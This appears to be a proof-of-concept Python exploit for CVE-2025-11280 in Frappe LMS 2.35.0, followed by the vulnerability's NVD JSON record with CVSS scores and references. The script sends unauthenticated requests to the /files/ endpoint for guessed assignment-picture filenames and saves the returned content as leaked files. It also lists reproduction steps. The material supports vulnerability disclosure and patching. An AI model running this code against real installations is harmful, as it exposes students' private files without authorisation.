CVE-2025-11280

# CVE-2025-11280 PoC - Frappe LMS Assignment Picture Handler Direct Request # Author: 0xHamy # Reference: https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1 import requests # Target configuration TARGET_URL = "https://target-frappe-lms.com" # The vulnerable endpoint is in the /files/ path # Assignment pictures are stored with predictable file names def exploit_direct_request(file_id): """ Exploit the insecure direct request vulnerability in Frappe LMS 2.35.0 The Assignment Picture Handler does not verify access permissions before serving files from the /files/ endpoint. """ # Construct the direct request URL to the assignment picture handler url = f"{TARGET_URL}/files/{file_id}" # Send the request without authentication # No cookies, no tokens, no session required (PR:N) response = requests.get(url, verify=False) if response.status_code == 200: print(f"[+] Successfully accessed file: {file_id}") print(f"[+] Content-Type: {response.headers.get('Content-Type')}") print(f"[+] Content-Length: {response.headers.get('Content-Length')}") # Save the leaked file content with open(f"leaked_{file_id.replace('/', '_')}", "wb") as f: f.write(response.content) return True else: print(f"[-] Failed to access file: {file_id}, Status: {response.status_code}") return False def enumerate_files(): """ Enumerate potential assignment picture file IDs File IDs may follow predictable patterns """ # Common patterns for assignment picture file IDs in Frappe LMS potential_ids = [ "assignment_picture_1.jpg", "assignment_picture_2.jpg", "homework_image_1.png", "submission_photo_1.jpeg" ] for file_id in potential_ids: exploit_direct_request(file_id) if __name__ == "__main__": print("[*] CVE-2025-11280 - Frappe LMS Direct Request Exploit") print("[*] Targeting Assignment Picture Handler") enumerate_files() # Steps to reproduce: # 1. Identify a Frappe LMS 2.35.0 instance # 2. Navigate to the /files/ endpoint # 3. Request assignment picture files directly without authentication # 4. Observe that files are returned without access control checks

{"cve": {"id": "CVE-2025-11280", "sourceIdentifier": "[email protected]", "published": "2025-10-05T04:15:35.457", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Frappe LMS 2.35.0. Impacted is an unknown function of the file /files/ of the component Assignment Picture Handler. This manipulation causes direct request. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. It is advisable to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4798441-F3FA-420C-B28E-7DB3096A2A2B"}]}]}], "references": [{"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1#steps-to-reproduce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327014", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327014", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659694", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1#steps-to-reproduce", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?submit.659694", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}